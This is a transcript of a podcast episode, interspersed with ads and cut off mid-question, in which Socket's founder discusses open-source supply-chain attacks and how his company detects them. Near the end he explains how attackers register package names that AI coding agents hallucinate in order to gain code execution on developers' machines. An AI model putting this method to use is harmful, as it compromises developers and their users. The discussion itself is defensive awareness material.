
Modern software relies heavily on open source dependencies, often pulling in thousands of packages maintained by developers all over the world. This accelerates innovation but also creates serious supply chain risks as attackers increasingly compromise...
Loading summary
Narrator
Modern software relies heavily on open source dependencies, often pulling in thousands of packages maintained by developers all over the world. This accelerates innovation, but also creates serious supply chain risks as attackers increasingly compromise popular libraries to spread malware at scale. Faras Abu Khadija is the founder and CEO of Socket, which is a security platform designed to protect software projects from open source supply chain attacks. In this episode, he joins Josh Goldberg to talk about his career in open source, open source supply chain attacks, practical security lessons, the expanding attack surface in software development, and more. This episode is hosted by Josh Goldberg, an independent full time open source developer. Josh works on projects in the TypeScript ecosystem, most notably TypeScript eSlint, a powerful static analysis toolset for JavaScript and TypeScript. He he is also the author of the O'Reilly Learning TypeScript book, a Microsoft MVP for Developer technologies, and a co founder of SquiggleConf, a conference for excellent web developer tooling. Find Josh on bluesky, Fostodon and dot com as Joshua K. Goldberg.
Josh Goldberg
Faras Abukadhijay welcome to Software Engineering Daily.
Faras Abu Khadija
Thanks Josh. Glad to be here.
Josh Goldberg
We're excited to have you. You have been in and around open source and general security practices for quite a while. Before we dive into you and Socket, can you tell us how did you get into coding?
Faras Abu Khadija
Yeah, I got into coding when I was in high school. I wanted to build a website to collect my favorite Flash animations. So I was kind of born in the era of Newgrounds and Ebaum's World and Albino Black Sheep and just all these kind of. I don't know if folks remember these or if they're too young. I don't know the audience of this show, but yeah, I always thought those things were fun and I wanted to kind of collect them all and put them onto one website. So I did a lot of downloading of those SWF files from other people's sites and then rehosting them on my own page. And I had to learn PHP to do that and MySQL and so that was kind of my first foray.
Josh Goldberg
And then you went into Stanford for computer science after that?
Faras Abu Khadija
I mean, yes, I did go to Stanford to study cs. My high school didn't have a CS class, so I kind of was just self taught with PHP up until that point. But learning CS at Stanford was amazing. A lot of the other majors at Stanford, they don't really necessarily emphasize teaching well, but that's one thing that the computer science department really stands out in. They have just like a ton of support like Other undergraduates actually are your TAs and like, help teach you. And so I learned a ton. I remember my first class I took there, it was using C. And I remember, like, my first reaction was, how does the computer know that these words are variables if they don't have dollar signs in front of them? Because in PHP every variable has a dollar sign. And so my mind was blown. Like, I almost spent too much time in PHP in high school and, like, it took like a little bit of unlearning to kind of like realize, oh, wow, CS and programming is this, like, really broad thing. It's not just PHP in MySQL yeah.
Josh Goldberg
Do you ever go back and look at the PHP you wrote in high school?
Faras Abu Khadija
I have actually done that before and it's hilarious. I didn't even know about functions, even after, like, years of writing it. I literally just pasted everything multiple times if I needed to do it in more than one place. So it's. It's horrible. But. But it worked. It kind of didn't matter in some sense. Like, I built a site that got. I think at its peak it had like 600,000 annual visitors watching all those Flash videos. And I don't know, it's. It's kind of funny how I think the lesson from that is that you should just jump in and do stuff. And I mean, I obviously would never write code like that now, but, like, if you let doing things the right way get in your way, it can kind of take the fun out of it and, like, stop you from just kind of, I don't know, catching the bug. And I caught the bug. What really got me excited and kept me going in, it was this idea that I can put code online and while I'm sleeping, it's like, working for me. It's like serving visitors. People are coming to the site, like, having a great time, and I'm literally asleep. It's like that scene in Fantasia with the brooms and the buckets and like, I don't know, it's like automation. I don't know, it's just sort of this cool idea of like, this thing is just out there. And I think at one point I put Google AdSense on the site and so, like, I was like, oh, I'm sleeping. And it's like making me money, you know, it's such a cool idea. Yeah. I don't know. That got me really into stuff in.
Josh Goldberg
High school and college, believe it or not. It's not the having excellent clean code that gets a lot of newcomers in it's the results and being able to have that superpower.
Faras Abu Khadija
Yeah, yeah. That said, like, I also think it's good to use functions. I wouldn't recommend anyone copy what I did in those early days.
Josh Goldberg
Good to know. So that was your first popular website. What was your second popular or hit project or website that got released?
Faras Abu Khadija
So while I was still in high school, I did another site that was around, like, sharing my notes for my AP classes that I was taking with other students so you could go there and like, you know, access outlines of different chapters in the book. It was kind of like a spark. Notes for AP courses. And that was great because a lot of high schoolers didn't want to read their textbook. And so that was something that got quite popular. That's also when I started learning about SEO and just like all the web search type stuff and like, how does Google work? How do you, like, properly semantically build web pages that are going to be indexed by Google? Google's going to love indexing and sending visitors to you. So that was a cool way to learn. And then like, after that, when I went to college, there was one other site that I did that was maybe notable, which was called YouTube Instant. And this was kind of the result of a bet that I did with a college roommate of mine. So Google had just announced this thing called Google Instant, which was a way to kind of. It's kind of like autocomplete on steroids. So as you type like letters into the search box, instead of just showing you, like, here are five possible searches that you might want to do. It would actually take you to the search results page of the first suggestion before you even hit Enter. So, like, you type A and then it's like, takes you to this actual search page with like the 10 links for Apple or whatever it thinks you were searching for. And so I saw that and I was like, oh, that's cool. I bet I could do that for YouTube. And it would be even more cool because now you're typing letters in and you're getting like flashes of like, different videos coming in. And like, it's almost like channel surfing, like YouTube. And so I bet my friend I could build it in an hour, which was kind of completely ridiculous. But I just thought like, oh, let me just. I don't know why I did that, but I did. And then he was. He was like, yeah, I'll take you up on that. And then I actually did build it in three hours. It was very simple. It was just using the YouTube API and putting A video embed into the page. No fancy web frameworks, no futzing with getting TypeScript and React and all that stuff set up. It was just literally one JS file and one HTML file. So very, very simple. Pretty horrible code as well. But got that up and then I put a tweet out and Facebook post out and went to sleep. And then I woke up the next morning and it was completely viral. It had gone, like, across the Internet overnight while I was sleeping. And I don't really, to this day really know why. I think if I had to guess, it was because it was. I mean, it was pretty fun. Like, once you used it, people wanted to share it, but, like, it was also because it kind of like piggybacked on Google Instant. And they had spent two years engineering Google to support that level of new load on. You know, just in terms of number of search pages being loaded as literally everyone typing letters, it's like 10x or more of the search volume that they had ever had in the past. And so they, like, hyped up how much, like, engineering effort they put into this. And then like, lo and behold, some college sophomore comes along and is like, I built the same thing for YouTube in three hours. And then that somehow, like, unintentionally, like, became this, like, media story. And then it was, like, fueled even further because the YouTube CEO tweeted to me and said, like, hey, this is great work. Do you want a job at YouTube? And then, like, that caused, like, a whole nother burst of attention. People were talking about how, like, the resume is dead and, like, building projects and putting them out there is the future of getting hired. And, like, all this thought pieces came out of it, and I was just, like, kind of swept up in this media storm, basically. So it was kind of a fun experience to go through as a sophomore and, like, kind of trying to not, like, say something stupid while getting interviewed by NBC or whatever, you know. So it was pretty cool.
Josh Goldberg
That sounds like a very thrilling ride. Are there particular lessons you took away from it that you still use now as a CEO on the other side of the hiring table?
Faras Abu Khadija
Huh? Yeah, I mean, I think the big thing is, like, just launch, like, just ship things. Don't think too much about it, like, build stuff in public. I mean, if I had sat around and, like, I don't know, tried to use the right framework or tried to. And it's funny, I say this, like, I'm actually good at this, but the reality is I'm more saying this as advice to myself. To remember, because I also tend to, like, over engineer things and, like, want to do things the right way and, like, sometimes don't ship. And, like, what I think worked in this case was I just, like, put it out there. It didn't really matter that it was, like, pretty bad code. I, like, put it out there and then I improved after I saw that people actually cared. And so that's the right way to do things. If you're interested in, like, finding something that works or that resonates with people, it's just. It's really about, like, the number of things you put out there, not, like, sitting around in a room by yourself trying to, like, think of the perfect idea. And that's a lesson, like, I've had to learn again over and over in my career, including, like, literally when I started my first company. And we kind of did the opposite of that, where we literally just sat around and, like, built some cool technology for about eight or nine months without really putting it in front of any users. And then at the end learning, actually, nobody wants this. We just spent nine months, like, building. It's a cool science project. I learned a lot. I'm glad I worked on it. But, like, nobody wants to buy this or use this. So I could have probably learned that really quickly if I just talked to people or had put something more minimal out there.
Josh Goldberg
Mm. You are not the first CEO to mention this on this podcast. Yeah, that's a really important learning.
Faras Abu Khadija
Yeah. There was even, like, a guy on Hacker news, like, when YouTube Instant was, like, on the homepage. It was actually on the homepage a couple of times. Like, multiple times at the same time. And then one of the comments, I remember this was this guy who. I don't know who he was, but he was, like, really upset that my site was on the homepage because he said he's like, I've been building the same site for three months and it has way more features and it supports, like, filtering and sorting the videos by views and by different things. And he kind of was explaining all the things it could do that mine couldn't. But, like, then someone replied to him and was like, you should have just shipped, like. And I saw that and I was like, you know, evidence of this lesson literally in that thread. And, I mean, I obviously felt kind of bad for him. He put in a ton of time and, like. But it sort of proves the point of he should have just shipped and no one really cares about all the advanced options he was adding. And you should have just put it out there sooner.
Josh Goldberg
Yeah, it's a pity. You've shipped quite a few things. We could take this either through your career or through your open source projects in general. Let's talk about the open source projects first because they're quite visible. Is this a continuation of the same mindset of you've just shipped a bunch of NPM packages? How does that play out?
Faras Abu Khadija
Yeah, I mean, so I got into open source originally because after that company I mentioned was called Pure CDN that I worked on for about eight or nine months, it was, we basically we're going to shut it down. And then we got really lucky and kind of out of nowhere, Yahoo offered to buy the company. And really they wanted us to just join the team and like work on JavaScript and video players and stuff like that at Yahoo. So we took the offer because it was me and my two friends and we were like, well, yeah, this sounds like a good way to wrap this up and make something of this, like, unfortunate situation that no one actually wants what we built. Maybe we can go to Yahoo and they'll use it. But they ended up not using the code really at all. Like they had bigger problems than reducing bandwidth costs of video. And so we ended up just kind of helping with more fundamental things like making their video player load quickly and work on mobile and stuff like that. But I did feel kind of sad that after all that work, you know, that science project I was talking about, all this cool technology and stuff we had put into it, like, didn't get to see the light of day and would never get to see the light of day because now they owned it and it was all proprietary code. And so after I left, I worked there for about a year and I, I'm proud of what I did there. But it was also one of those things where, you know, it's a really big company and it was like hard to ship things. I felt like I was fighting the company to like ship things, which is crazy. At one point my manager said to me, you need to do less. Just like stop trying to do all this stuff. Like, you're making my life hard. Thinking like, this is not why we required literally the CEO of Yahoo, Marissa Meyer at the time told, told us and she was on a startup acquisition spree. During this time she told us, the reason we're buying you is because we want you to inject startup energy and like just this attitude of getting things done and like shipping stuff into the company and like, this is why we're bringing you on. But we were just too Few and we were on a much bigger team with the old school folks that were there before. And so like we did some good stuff and there were some really smart people on the team. But ultimately, like, I think the organization couldn't really handle it like the old blood one rather than the new blood, if that makes sense. So, so I left and then I wanted to play with some of the same ideas of what the original company was doing, which was about building a peer to peer cdn. So think like a content delivery network like cloudflare or Akamai, but powered by end user devices. Like your laptop is in a network, kind of like BitTorrent and if you're watching a video, you're going to serve that video to other folks that are coming to the same site. And it's sort of like a big peer to peer network and that could speed up sites in some cases. And it could also massively reduce the cost to host sites, which before Cloudflare was really popular, CDNs were actually quite expensive before they started giving everybody bandwidth for free. And so this was where the idea came from. And so after I left Yahoo, I just decided, oh, it'd be cool to like build that again, but in an open source way so that no one can ever like take it away from me or from the community. I want this to be open. I want anyone to be able to use this. And so that was like why I got into open source. I mean, I had always thought of open source maintainers as this sort of crazy awesome level of like programmer that like I one day wanted to aspire to be. You know, when I was learning the code, I was almost afraid to look at open source packages because it was like all this crazy advanced code that how could you understand what it's doing? So I kind of always thought it'd be cool to do that and like give back in that way. And then I had this opportunity to do it with WebTorrent. And so that's kind of what came out of all this, was I ended up building a torrent app that could work in your web browser and do peer to peer, like from my browser tab to your browser tab without any software installed on the computer. And so you could really get like bittorrent experience like on a website, which.
Josh Goldberg
Is amusing now because BitTorrent has BitTorrent web, yeah.
Faras Abu Khadija
And actually they use WebTorrent under the hood, the protocol that we developed, like all the major torrent clients actually support webtorrent now finally, after like 10 years of trying to get adoption of this so standard. So it's pretty cool to see finally that it's actually like the vision has actually kind of happened where any torrent client running on a desktop can talk to a web browser user across that bridge, which is pretty crazy. I mean, when you think about it that that's actually possible with WebRTC as.
Josh Goldberg
An open source maintainer. How do you feel when one of the projects you lead or maintain or have worked on becomes successful in this way?
Faras Abu Khadija
That's a fun one. So at first it's like awesome, right? I mean, you get to talk about it, people are interested in it, you get invited to speak at nodecon for JSCONF or whatever. And I remember at that time in my life, I was my early 20s and it was super fun getting to go travel the world. Like I went to so many countries I'd never been to before, met people. And it was, it was funny too because people, they would use me and a few other early node folks as the mad science track of the conference. So they'd have all these talks on like REACT and kind of practical things like, you know, how do you deploy a microservice and this and that and the other thing. And then they wanted to have like certain talks that were like, you're never going to use this at work, but it's just cool. And like that's what they would invite me to be the entertainment, I guess, in that sense. And so at least I think that's why I was invited to those. And so it was just fun to like be able to show people what I was building. And it was also very in public because honestly for the first six months of talking about WebTorrent, it didn't work. It was literally like in development. And I was talking about it and explaining how WebRTC worked and like how this was all going to work and like doing some cool demos of WebRTC for people during the talks, some live demos and interactive things with people all like interacting on a whiteboard from their phones and on my screen and like over peer to peer network. And it was really cool, but it was, it wasn't web torrent. And so I was definitely doing it in the open and it was really fun. But then when you get to a certain point in your project, like what ends up happening? I've seen this happen so many times, not just with me, but with like every, basically almost every maintainer, but not all, but almost every maintainer that I know is that they eventually just get burned out of doing it. Because at Least for me. What happened was I felt this incredible responsibility to like, fix every issue that was reported on GitHub. And at first the volume was really low. It was like someone would open an issue and you'd be like, oh my God, this is so cool. I have a user using this. You're like so happy. And then eventually you get to a place where you wake up every morning and it's like 40 issues opened and you're like, oh my God, this is not sustainable. And then they were all issues too. Like, they weren't even. It was like I kind of forgot why I got into it almost by the end because I was like, someone's reporting a bug. Oh, it doesn't work on Arch Linux version whatever. And I'm like, okay, I don't even care. I should have just said to them like, you submit a PR if you care about this and I'll review it and merge it. But instead I took it like, oh, it's my job to go and fix it. And so I very much burned myself out by the end and like, basically needed to walk away and be like, add other folks as maintainers and just kind of like go do something else for a while.
Josh Goldberg
There's a great blog post that you've, I think, alluded to in the past from Nolan Lawson, what it feels like to be an open source maintainer, talking about how it's like you have this giant stretch of people in front of you and there's absolutely no way you can address all of them. And it feels awful on both ends.
Faras Abu Khadija
Yeah, it definitely feels like that you want to do the right thing and help them and you feel this obligation because it's like your code and they found a bug and they're right, there is a bug and like, you're correct and so therefore I must fix it. But like, actually there's not a contract saying that you have to do that. It's like, I put this code online as a gift to the world. I didn't promise it would never have a defect. And so it's actually okay. It's actually enough to give a one time gift. You don't have to Give a permanent SaaS subscription of your time as a gift to the whole world. So I think that was the realization that I finally got to. But after getting super burned out.
Narrator
Is your AI model taking weeks to train or is it too slow for real time inference? Fixstar's AI Booster is the acceleration platform that solves both. AI Booster automatically analyzes and optimizes your entire AI pipeline. The result? Dramatically faster training, up to five times faster, and compute costs slashed by up to 80%. Trusted by major companies including Sony, Honda Mobility. Stop waiting on your hardware. Visit fixedars.com to learn how to.
Josh Goldberg
Let's talk about that dark side of open source because it transitions really well into what you've been doing recently. Specifically, let's talk about security. What is socket.dev and what's the open source problem that it's trying to address?
Faras Abu Khadija
So open source, when it works is amazing, right? You can just go out and grab any code from the Internet that's written by somebody you don't know, you don't know who they are. You probably didn't even read the code. And you can just pull it in and run it on your computer and saves you a ton of time, right? It's this amazing buffet of unlimited, you know, all you can eat code that you can just pull from. But there are bad guys, you know, there are criminals that have realized that actually getting access to an open source project and putting malicious code into the package is a great way to attack a bunch of people at once at a really large scale. And so we've seen a lot of attacks of this nature over the last several years for all kinds of motives. Sometimes it's politically motivated, it's countries attacking other countries or trying to attack US Companies or things like that. Other times it's just basic cryptocurrency. Criminals that want to just steal people's crypto. There's even been cases where people have like, they just, they were a good maintainer at one point in time, and then they just, something just snaps in them and they want to just, they want to watch the world burn. And so they'll put malicious code into their own package that has been trusted for super long. And so it made me start wondering, like, why is there no way to stop this? Why is there no way to catch this? Especially after like the fifth or sixth time I saw this happen, you know, I mean, the first time I saw this Happen is in 2017 with EventStream getting compromised. This was a package where a new maintainer was added who basically said, hey, can I help maintain this package? I noticed it hasn't gotten any updates in a while and they got access. And then after about 30 days of doing some good changes, they put in a malicious change that stole a bunch of cryptocurrency out of a specific application that was targeted. So they obfuscated the code and then it only triggered in one specific Electron app. So Everyone else who had the code, it just sort of did a no op. But in this one app, it would trigger and steal all the user's money. So this kept happening. And then I looked around and I was like, why is no one doing anything about this? Is this just, like, the way the world works? I was also confused. Why is nobody reading the code that they're using? And then I realized I'm really weird. And, like, I read every one of my dependencies before I use it. I mean, like, maybe not anymore, but, like, when I was working on WebTorrent, certainly it was a small enough surface area that I could actually do that. And then I realized, like, no one else really does this. Like, it's a pretty rare thing. Like some people do, but it's pretty rare. And so that's why, like, there's really not much of an immune system against this. Usually what happens is, like, the attacker makes a mistake that ends up showing in a log file or something, and then the community just accidentally discovers it. And that's what kept happening. It was always like, oh, we accidentally noticed that, like, this package has been stealing everyone's information for the last two weeks. And that's when I was, like, really worried because I'm like, how many more of these do we not know about if, like, we're just accidentally finding these? So in the event stream example, let's give you an example of how we found it as a community. It turns out the attacker, they obfuscated their code and they were using the crypto module in node JS to decrypt the attack code. But they didn't know that, like, in literally a day or two after they backdoored the package, that node decided to deprecate the function that they used. And so everybody who was using the package started getting this deprecation warning. And then they traced it back to this chunk of code that was added into this library. And so, like, that's such a random accident. If that hadn't happened, it might have gone for weeks or months without being discovered. And this pattern just repeats in every one of these attacks. And so that's kind of like when I was like, dang, this is a problem. And, like, no one seems to know how to solve it.
Josh Goldberg
So what are the techniques that we can use as application developers, separate from, say, socket, just to kind of harden ourselves against these before we go into specific services?
Faras Abu Khadija
Yeah, yeah, for sure. I mean, the number one most important thing that everyone should be doing, and everyone is probably already doing, but if not, you should Use a lock file. So your package manager, probably depending on the language, but almost all of them, support a lock file of some kind. And this is very important because it locks down the specific versions of every package in your dependency tree. And so that when a new person on your team clones the code down and runs the install command to install those packages, they're going to get the exact same set of dependencies that you had when you built the application. And so there's no randomness or there's no new versions being brought in unintentionally. It's very explicit. There's also a record of what versions of every package were in use in the git history. So everyone knows what was in use at every point in time in the application. That's the number one thing you can do. That obviously doesn't stop you from installing a bad package, but at least you're not just pulling in whatever happens to be the latest version at the time you run the install command. And I want to emphasize too, it's important that you're using a lock file, not just pinning your direct dependencies to a specific version. If you pin your direct dependencies, that's a good start, but that doesn't lock down the transitives, because those can also have loose ranges. And then the package manager will go ahead and it will install your direct dependency at that exact version. But then in the transitive dependencies, those can be loose ranges that it'll just pull the latest stuff as well. So you're still subject to really, you're going to get whatever code happens to be there at the time you run install. So that's like. I think that's the biggest thing.
Josh Goldberg
What's another good tip for us?
Faras Abu Khadija
I mean, really, the best tip is to use Socket, but I don't want to. And I'm not just saying that because I started the company. So, I mean, forgetting about the specific solution of Socket, like, really, you want to have some process for vetting dependencies. You want to know what you're depending on. And I think what really helps is having a bit of a mindset shift around how you think about dependencies. So today a lot of people think about them as, you know, just this magical code that just comes from the cloud or from the sky somewhere, and then it just sort of solves your problems for you. And they assume because it's open source, that it must be safe or that someone is vetting it. Right. But that is really not the case. Everyone is assuming that someone else is vetting this Code, right? Like everyone has that assumption. Oh yeah, it's open source. Like someone will vet it. Everyone is making this assumption. And then you actually realize that very few people are actually opening up the code and looking at it. Like, shockingly few, right? This is really obvious when you look at the kinds of attacks that have been pulled off by these attackers and not discovered for, you know, like I said, weeks, sometimes months. They're so obvious, these attacks. They're like if you just open one of the JS files or one of, you know, one of the source code files, you would see, like, just. It doesn't look like normal code, it looks super obfuscated. Or there's these giant base 64 strings in there. There's, you know, crypto module being imported to decrypt the code, or there's eval happening, you know, like a string is being executed as code, or there's obvious things like the environment variables are being collected and then sent off in a network request to a suspicious URL. It's like horribly obvious when you look at the file. And then you realize, okay, no one is looking at this stuff.
Josh Goldberg
So.
Faras Abu Khadija
So this is how I was able to sit in plain sight. It's interesting because Linus Torvalds, you know, the creator of Linux, has this law, I think it's called Linus's Law, that is quite well known. I think it's the idea that with many eyeballs, all bugs are shallow. Hope I'm getting the quote right. But something like that. And the idea is that with open source software, right, eventually with enough eyeballs looking at the code, all bugs will be discovered at some point and then be fixed. And it's true. And he's really highlighting like the value of open source code versus proprietary code and how when you have open code, people can find these things that can fix these things. And that is, that is all true. But the question is on what timescale, right? How long is it going to take for the community to find the bug, right? And in the case of a malicious actor putting malware into a library that everybody depends on, the time really matters because some of these things have 10 million downloads a week. And so if something's compromised for even, you know, 24 hours before people notice, like you're going to have a lot of affected people like, of affected applications and companies. And so I think that's really the caveat is like, how long until detection? And before we started Socket, what we saw was there's a great research paper published in Usenix Security conference a few years ago that found that it was around like 200 plus days for a malicious package to be discovered by the community and taken down. So really, really bad results, you know what I mean? In terms of hoping for the community to kind of self correct in this way. So I think the main thing is just shifting and thinking of open source code not as someone else's problem, but actually treating it as your problem, it's part of your application. At the end of the day, all this code gets bundled together and run in a single process or in a single binary or in a single application. And so it doesn't really matter if you wrote this code and then someone else wrote that other code. Like ultimately you're shipping all that code together to production and like you're responsible for what it does. It has access to all your user data, it has access to all the crown jewels. So you know, at the end of the day it's your code, even though you got it from GitHub or you got it from PyPi.
Josh Goldberg
So we've had this problem where we have an absurdly fastly growing amount of other people's code in our applications these days. We have so many features as developers, we expect hot module reloading and deduplication of packages and all this, that there's just an inhuman amount of code to look through. So having services look at that code for us seems like a natural next step. And you mentioned some kind of somewhat straightforward heuristics like importing the node crypto module or sending your process environment variables in a network request. Stuff that's almost humorously evil. So how does Socket take a look at the other people's our code and determine what is something to be complained about?
Faras Abu Khadija
Yeah, great question. So when we started Socket, we started with our own observations about, you know, these types of attacks we were seeing. So things like accessing environment variables, accessing the file system, accessing the network, especially when that was a new behavior in a package. Like, you know, it hadn't done that for any other version in its entire history. And then suddenly now there's a new version that came out yesterday that needs all these capabilities, all these permissions, you know, that weren't needed before. And so that's kind of what we started for focusing on, was detecting just that introduction of new risky capabilities. Oh, install scripts is another good one. Not all package managers have this concept, but NPM is a famous one that does. And this is a way to automatically run code on the developer system at the time of package installation. And while it has legitimate uses, almost every single piece of malware that we were seeing on NPM took advantage of this functionality. So the presence of one of these didn't necessarily mean you were dealing with malware, but all malware pretty much had that characteristic. So you could start to build up these heuristics of what looks like a suspicious change, and then you could sort of alert on them. So if you're about to do an NPM update or you're about to pull in a new package, for the first time, you could see what socket had identified in that package. But then what we found was a lot of teams wanted something even more simple than that. They wanted us to just have like a yes, no, like a Boolean. Is this package malicious or not? And so right as we started noticing that desire from folks we got our hands on GPT 3.5. We were playing around with this idea of like, can LLMs actually, like, look at code patterns and figure out what the code is doing? So not like the, the main way people were using AI at that time was just sort of to build these little chatbots, like you can chat with your database or whatever, right? These types of silly, silly things. In my opinion. We were really asking can they understand the concept of maliciousness and, you know, can they look at, you know, the code and tell you, tell you whether there's something maybe worth a second look? And so it didn't really work that well with GPT 3.5, but then GPT 4 came out and we got access to the API while it was still in, like private beta. And then we found, holy crap, this actually works really well. So what we had to do though was because of cost, right? It's super expensive to use LLMs, especially if you're trying to scan every open source package. NPM alone has like 2 million packages, not to mention all the other ecosystems. So we had to decide when it was worth the cost and, you know, the expense to actually do that type of analysis. And so we used some of those static signals that we had developed before, like, does it have network? Does it have file system? Does it, you know, eval a string? Does it look like, look like it has obfuscated code? Then we would take just those parts and kind of feed it into the LLM. And that's how we, you know, we built the system that we have today. It still has false positives, but if you put a human in front of it to kind of do the final sign off, you can actually get like a really high signal from it. And so that's kind of what we. One of the like main things that Socket provides for our customers today is like you can get this like really high signal feed whether packages are malicious or not, and then new ones that are being backdoored that no one knows about yet. So like if you open up our feed right now, you'll literally find something from 30 minutes ago that was just published that's malicious, that's still live on the package manager registry that you could install if you were so unlucky to do so. And yeah, and we report them when we find them by the way. So we try to get them taken down and protect everybody. But we often get really, really slow response times from the different registries. Some of them are better than others. PYPI is pretty good these days, but like a lot of the other ones are very slow. And so you'll have things where like there's malware from nine months ago that's still live that they just don't take down. So you have to use something like Socket or some other database of this knowledge to kind of protect yourself.
Capital One's tech team isn't just talking about multi agentic AI. They already deployed one. It's called Chat Concierge and a simplifier in car shopping using self reflection and layered reasoning with live API checks. It doesn't just help buyers find a car they love, it helps schedule a test drive, get pre approved for financing and estimate trade in value. Advanced, intuitive and deployed. That's how they stack. That's technology at Capital One.
Josh Goldberg
So let's say that I'm a company, I'm an enterprise, I have software with dependencies on let's say a couple of registries, NPM and PyPi. What would I do? How do I use Socket to save myself from these ridiculous malware attacks?
Faras Abu Khadija
Yeah, so the easiest way is if you're on GitHub or one of the other major source control systems, GitLab, BitBucket, you can install Socket from the marketplace and then we just go right into your GitHub installation and we can start observing all pull requests and all commits that are happening on all the repos and we scan every single commit that we see. So we can do two things. One is you first. First of all you just get visibility, like what dependencies am I using across all my repositories? And you can have like kind of a snapshot of every point in time as that changes. So if you ever want to know in the future, like, hey, did we ever use this bad package at this bad version number, you can look it up and see and then you can also get a inventory of like, you know, all of your existing risk. So any malicious packages or vulnerable packages or other risks that you have within your current set of dependencies, you'll be able to see that. But the most important part is the preventative piece. So that's where you know in a pull request workflow, whenever a developer is adding a dependency or updating a dependency to a new version, those are the two kind of moments where you're bringing in new third party code for the first time. And so Socket will look at all those changes and if there's any risks, it will leave a comment in the PR and just tell all the folks on the team, even the code reviewers as well, as well as the original PR author about the risk that was identified. And this is all configurable. So obviously malware is frequently what folks want to block, but you can even use it for things like I don't want to use a package that hasn't had an update in five years, that would be a bad idea, or I don't want to use a package that has obfuscated code in there unless I click the link that Socket provides and go and look at why is it doing this? Does it make any sense? So you have folks set it up in different ways and you can kind of customize it to what you care about for your team.
Josh Goldberg
Sure. I imagine especially in a time where so many companies and open source projects are using tools like renovate and depend a bot to automatically send PRs for new packages. Something that's blown my mind is most of the time by default. These PRs come in as soon as possible. A lot of default configurations don't say wait for seven days of on package release. This feels like something that Socket would be very useful for to make sure that you're not installing a malicious package immediately upon its introduction.
Faras Abu Khadija
Yeah, that's a great point. One of the things that we've actually seen with a customer is dependent bot opened a PR and then Socket came in and left a comment and said, do not upgrade this to this package. It's malicious. So it was like a battle of the bots. One bot is like upgrade and then another bot is like don't upgrade. So yeah, no, totally. It's a really good point. And some folks do try to do a delay to sort of protect themselves from these things. So that is another piece of advice, you know, that I would recommend if you have an easy way to, you know, not taking updates until, you know, seven or 14 or 30 days have gone by. That's a really great way to avoid some of the, a subset of these attacks. Like it won't avoid all of them. As I mentioned, some of them stick around for hundreds of days, even after sockets identified them and reported them. So it's not foolproof. And it also means that you're not, you're also not going to get vulnerability fixes if you're waiting 30 days unconditionally. So you might want to have a more nuanced policy where you wait 30 days, unless there's a critical CVE, in which case you might want to do it sooner. So, yeah, there's really a lot of, a lot of options here.
Josh Goldberg
One of the great and terrible points of working in security is that as soon as you fix or largely prevent one style of attack, the attackers will then figure out a another somewhat more complex area or style of attacks. What do you think is the next round or the next area that you're going to have to focus on?
Faras Abu Khadija
Yeah, I think that there's a couple ways I could take this. I think I'll maybe mention just the way that we're seeing some of the same types of attacks that have affected open source package ecosystems starting to come to maybe less obvious ecosystems like Chrome extensions, Firefox extensions VS code extensions. So these are also just JavaScript packages at the end of the day, if you think about it. And so some of the same types of supply chain attacks that we've seen affect NPM are now starting to affect all these other ones. So. But they also have in some ways, even their own challenges. If you take Chrome extensions for example, they're similar to NPM packages in that they run in a very privileged environment, they run in your browser, and some of them have access to all site content on all pages that you visit. So kind of very similar to a package running on your local machine with all of your user permissions and, you know, being able to access all your local files and things like that. But in some ways they're even worse because. So there's a certain thing we've seen in Chrome extensions that we've seen a lot less of in open source ecosystems, and that is selling of extensions. So folks will just sell their extension to somebody else. You know, it could have a million installs and they'll just sell it for like 30k or 40k to some random person who offers them money. And I kind of get where they're coming from. A lot of times folks build these extensions and they don't have any way to monetize them and they're just sitting there and then, you know, they can get a meaningful chunk of money like that. You know, they're just like, yeah, why not? And they often don't necessarily know that the person buying it is going to change the behavior in a malicious way. They often tell a story about how they're going to improve it, they're going to keep working on it and all this other stuff. So we've seen that happen a few times in the Chrome ecosystem to really poor results for everybody involved. So I think that's an area for us that's like, you know, I guess it's sort of expected that attackers are going to go there. They're just always looking for where's the next way that we can get in into environments. And I guess I should just to kind of cap that off, I should mention that we actually just announced this week, yesterday, so July 29, for those who are listening to this at a future date, that we now scan Chrome extensions and we're going to be doing VS code and the rest. So very exciting new product for us. And yeah, hopefully we can help keep folks safe, you know, even in their browser. But yeah, I think the other thing that's interesting is AI, just the way folks are using it. So there's a lot of folks vibe coding these days. And one, one other area that we've seen attackers go is, you know, everyone knows LLMs can hallucinate. And one of the most dangerous ways they can hallucinate is when you're, when they're writing code, especially if they're executing that code like without user interaction, like in an agent. And so everyone is pretty aware, I think, of the idea that, you know, they can write buggy code, they can write, you know, poor quality code, spaghetti code. But far fewer people have realized that, you know, LLMs can also just write insecure code, or specifically they can install dependencies that are insecure. In some cases they can hallucinate package names that don't even exist. They're not even real packages. And so what attackers have actually started doing is like running the LLMs and generating a bunch of, like asking the same question a bunch of times, getting a bunch of lists of what packages the LLM attempts to install and then they go and they squat on those names. So if you can basically predict what the LLM is going to hallucinate, you can go register all those names and Just like you would squat on a domain name, you can squat on the hallucinated names and then you can, you know, basically get remote code execution on anyone's machine, you know, when the LLM selects those packages. So that's one where it's nasty and it's very, very much like a 2025 kind of a problem.
Josh Goldberg
It's kind of a beautiful attack when you think about it. It's just so clever.
Faras Abu Khadija
Yeah, I agree. The attackers are always. I mean, that's what they do. Whatever's new, they're already thinking of how to break it. In this AI world where everyone's just trying to go super fast and like, you know, security is an afterthought, as it always is. Whenever there's like a new paradigm shift, there's going to be stuff like this and the attackers are going to find it like it's to going always. And that's definitely what's happening with AI. Like, security is such an afterthought. It's just like, you know, I mean, another one is MCP servers, right? Everyone is just hooking up, like they're taking all these API tokens and putting them into like, local files on their disk that any malware can just grab, right? Any, any NPM package that's backdoor can just take those things. They're putting all these tokens into these files and then they're connecting all these, you know, disparate data sources like your, their Google Drives, their, you know, their emails. They're all their most sensitive information so that they can talk to, to it, you know, and have the MCP server, you know, give new tools to the agents. But then first of all, the files are just sitting there with all the tokens. But then on top of that, you fundamentally have a black box AI model that nobody really knows what it's going to do that's like, you know, has privileged tokens accessing like all this stuff. So it keeps me up at night a little bit.
Josh Goldberg
As a member of the defense or the blue team, how do you prevent against these types of attacks?
Faras Abu Khadija
